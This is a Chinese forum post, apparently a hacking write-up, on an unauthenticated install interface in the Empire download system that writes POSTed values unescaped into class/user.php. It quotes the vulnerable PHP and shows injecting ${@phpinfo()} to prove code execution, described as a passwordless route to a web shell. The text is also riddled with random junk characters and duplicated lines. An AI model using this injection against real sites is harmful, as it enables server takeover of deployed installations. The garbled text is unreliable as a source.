这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
, O8 a1 U# O" A) k& J* j+ j( Y4 f3 [/ A: r
e3 p7 \5 C( v这是帝国的一套下载系统 如图
( a, _+ i9 O A. z, qps(不需要任何账户和密码,直接写shell)
8 {9 F( J6 W+ |( L, j; x由于很多站是由于下载要整合discuz 等等一些论坛....
" i8 O1 O; @0 R5 m
; O$ W; }' p4 v. G4 g B而帝国他又有一个万能接口,如图 3 p4 w+ E- s; v, S# d2 j
6 I0 ~3 w. j+ a6 O& N* n
' O; D4 t% F( B$ y! p3 Z' J6 v; J而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码1 `1 z4 {' p$ d& n2 M: Q
+ ?+ j0 a% @6 \! J5 L
当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
' i9 H) f' s7 |5 [1 r( a+ P+ {9 b" f
; I1 U9 R# P+ N+ z& s d f在data/fun.php中的15行9 V% P9 ^- r8 b, F* { B. G
" u8 w5 U2 v6 Q7 q
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {
$ N" y+ G. e b$ D: t17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干
. x. l4 X8 _) O U, m6 L
; s- q- c% v4 e( ?" d6 Y/ a9 }2 @& b这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);2 Q9 p* e5 M1 |6 B/ |
0 n5 o1 O# N! t+ ~0 B1 S
他将传进来的变量进行了切割,然后赋给了$filetext0 x3 W+ F$ o# n4 ^
) p% N, |+ N/ ?: j. F! P然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了
, t, q/ [5 F) r6 [2 [. S
6 i. M$ h x, |4 B我们看看写入的结果,随便填一个
+ s8 o, r! P! p7 [! ? P# I( Z' a9 g( Q
: q/ p2 ]' }" G: K6 O3 z
4 b2 N3 ^7 W- g" f! |4 s7 a3 ?) z% a8 Q2 d! w/ a% t, r* `
7 Z/ ?& p9 l( F/ a% q
) z; U6 P4 A" H; s' ?1 }
" h8 f2 ?# j ]# {+ V/ n1 m! |( O6 _+ U9 u6 ]
9 L/ }$ A% w( D0 {# f8 Q; p( {. {$ Z1 W
7 V h5 c$ ] `: R6 _, ~' b+ v
$ p, }% D+ G7 q& }4 r* A C( \/ s8 n) e$ W# `0 z
! y% g& ]7 d2 ~) j) I9 r4 d8 K$ T* m3 p5 F% J5 M# q2 N7 K
# U7 Z+ w4 e5 v/ B7 z1 h- w
8 J9 [7 b; g' a! L6 v
# r6 Z9 H* y3 z5 E% `
* G8 t% H& k8 K w2 T% h$ Z
( X: i7 W. E, S0 m3 s+ o* L( s" Z/ H
所以我们淫荡点,写个${@phpinfo()}试试 & l/ [7 W2 u9 a8 ^5 p
然后访问以下class/user.php这个文件( g: s. S) X5 |" p
日了吧 % U8 N" ~) v. b' l% @
$ G- U; f4 p$ q
6 ~2 N: m" V5 a5 y/ y' O& B. q3 x$ I& U: C" R. d. x
# p: v& q5 V% @* j1 a. h, i3 h# n( A! ~ K2 l: z0 K- x2 ?& N
|